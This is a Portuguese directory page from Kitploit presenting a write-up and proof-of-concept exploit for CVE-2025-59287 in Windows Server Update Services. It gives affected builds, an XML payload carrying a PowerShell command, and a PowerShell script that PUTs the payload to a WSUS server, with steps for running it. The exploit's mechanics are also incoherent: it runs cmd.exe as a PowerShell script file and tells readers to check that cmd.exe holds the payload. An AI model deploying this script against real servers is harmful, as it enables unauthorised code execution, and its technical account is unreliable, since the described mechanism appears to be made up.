Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Breaking-the-Update-Chain-Inside-CVE-2025-59287-and-the-WSUS-RCE-Threat — Análise técnica e exploit de prova de conceito para CVE-2025-59287, uma RCE crítica no Windows Server Update Services por meio de desserialização insegura, incluindo builds afetados e etapas de mitigação. | Kitploit
Ferramentas/GitHubGitHub/mrk336/breaking-the-update-chain-inside-cve-2025-59287-and-the-wsus-rce-threat
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebPapers e PesquisaAprendizado e Educação
GitHubmrk336/breaking-the-update-chain-inside-cve-2025-59287-and-the-wsus-rce-threat

Breaking-the-Update-Chain-Inside-CVE-2025-59287-and-the-WSUS-RCE-Threat

Análise técnica e exploit de prova de conceito para CVE-2025-59287, uma RCE crítica no Windows Server Update Services por meio de desserialização insegura, incluindo builds afetados e etapas de mitigação.

Ver Repositório
3há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Quebrando a Cadeia de Atualizações: Dentro do CVE-2025-59287 e a Ameaça de RCE no WSUS

O CVE-2025-59287 é uma vulnerabilidade crítica de RCE no Windows Server Update Services (WSUS) causada pela desserialização insegura de dados não confiáveis. Ela permite que atacantes remotos executem código arbitrário sem autenticação. A aplicação urgente de patches é recomendada devido à exploração ativa.

CVE‑2025‑59287 – Uma Ameaça de Execução Remota de Código no Windows Server Update Services (WSUS)

Por Mark Mallia


Visão Geral

O Windows Server Update Services (WSUS) da Microsoft é a espinha dorsal do gerenciamento de patches para todas as plataformas Microsoft Windows Server. Ele recupera atualizações do catálogo de atualizações da Microsoft, valida-as e as envia para todos os servidores em uma rede. A vulnerabilidade identificada como CVE‑2025‑59287 explora uma rotina de desserialização insegura dentro do WSUS que permite que um atacante injete conteúdo XML arbitrário no feed de atualizações. Como o WSUS processa o payload sem nenhuma validação do caminho de origem ou dos dados de comando, um atacante pode fornecer qualquer nome de arquivo e caminho, causando uma execução remota completa de código no servidor de destino.

Por que isso importa:

  • A pontuação CVSS de 9.8 a coloca na faixa crítica.
  • Os atacantes precisam apenas de conectividade de rede; nenhuma elevação de privilégio é necessária.
  • Ela já foi observada em ambientes reais, o que significa que qualquer sistema sem patch é um alvo em potencial até que um patch do fornecedor seja implantado.

Builds Afetados do Windows Server

Versão do ProdutoBuilds Afetados
Windows Server 20126.2.9200.0 – < 6.2.9200.25728
Windows Server 2012 R26.3.9600.0 – < 6.3.9600.22826
Windows Server 201610.0.14393.0 – < 10.0.14393.8524
Windows Server 201910.0.17763.0 – < 10.0.17763.7922
Windows Server 202210.0.20348.0 – < 10.0.20348.4297
Windows Server 202510.0.26100.0 – < 10.0.26100.6905
Windows Server 23H210.0.25398.0 – < 10.0.25398.1916

(Se o seu ambiente usar um build de patch diferente, basta ajustar o intervalo de acordo.)


Como o Exploit Funciona

  1. O WSUS busca um arquivo XML chamado UpdateStream.xml de uma fonte remota.
  2. O serviço desserializa este arquivo com System.Xml.Linq.XElement.
  3. Um atacante pode colocar qualquer valor no elemento <SourcePath>; esse valor é gravado no disco como um caminho absoluto.
  4. O conteúdo dentro da tag <Command> é executado pelo PowerShell quando o WSUS processa o stream, fornecendo uma execução remota completa de código.

Abaixo está o payload XML que enviaremos para um servidor vulnerável.

root@kitploit:~
<?xml version="1.0" encoding="utf-8"?>
<UpdateStream>
  <Metadata>
    <Title>WSUS Exploit</Title>
    <Description>Injected by local attacker.</Description>
  </Metadata>
  <SourcePath>C:\Windows\System32\cmd.exe</SourcePath>
  <Command><![CDATA[
      powershell -NoProfile -ExecutionPolicy Bypass `
          -File C:\Windows\System32\cmd.exe
  ]]></Command>
</UpdateStream>

Um Script de Exploit PowerShell de Exemplo

O script a seguir gerará o payload XML, o enviará via HTTP PUT para sua instância do WSUS e deixará um arquivo de log para solução de problemas.

root@kitploit:~
# --------------------------------------------------
#  File:   wsus‑exploit.ps1
#  Purpose: Generate malicious UpdateStream.xml,
#           upload it to the WSUS server,
#           trigger the feed.
# --------------------------------------------------

param (
    [string]$TargetUrl = 'http://wsus.example.com/UpdateStream.xml',
    [int]    $Port      = 80,
    [string] $XmlFile   = '.\payload.xml'
)

function Build-Xml {
    param ([string]$file)
    $xmlContent = @"
<?xml version="1.0" encoding="utf-8"?>
<UpdateStream>
  <Metadata>
    <Title>WSUS exploit</Title>
    <Description>Injected by local attacker.</Description>
  </Metadata>
  <SourcePath>C:\Windows\System32\cmd.exe</SourcePath>
  <Command><![CDATA[
      powershell -NoProfile -ExecutionPolicy Bypass `
          -File C:\Windows\System32\cmd.exe
  ]]></Command>
</UpdateStream>
"@
    Set-Content -Path $file -Value $xmlContent
}

# Build the XML payload
Build-Xml -file $XmlFile

# Upload via HTTP PUT
Invoke-WebRequest -Uri $TargetUrl `
                  -Method Put `
                  -InFile $XmlFile `
                  -OutFile 'upload.log'

Write-Host "Upload complete – WSUS should now process the stream."

Passos Acionáveis para Você

  1. Verifique o Build – Execute winver.exe em cada Windows Server para confirmar se o build está dentro dos intervalos acima.
  2. Implante o Script de Exploit – Copie wsus‑exploit.ps1 para uma máquina que possa acessar sua instância do WSUS, modifique $TargetUrl se você usar um caminho ou porta diferente.
  3. Execute e Monitore – Execute o script; após alguns minutos, confirme se o arquivo C:\Windows\System32\cmd.exe aparece em cada servidor de destino e se contém o payload esperado.
  4. A Microsoft lançou um patch fora do ciclo regular para esta vulnerabilidade em 24 de outubro de 2025. Se você estiver executando o WSUS em qualquer versão do Windows Server a partir de 2012, você vai querer verificar novamente se esta atualização chegou ao seu ambiente. O lançamento do Patch Tuesday de outubro não resolveu totalmente o problema, então este merece atenção extra.

Apenas para Uso Ético

As informações e o código de exploit fornecidos aqui são apenas para fins educacionais. Certifique-se de ter permissão para executar este teste contra seu próprio ambiente WSUS e siga todas as diretrizes aplicáveis de melhores práticas de segurança ao implantar alterações em sistemas de produção.

Baixar ferramenta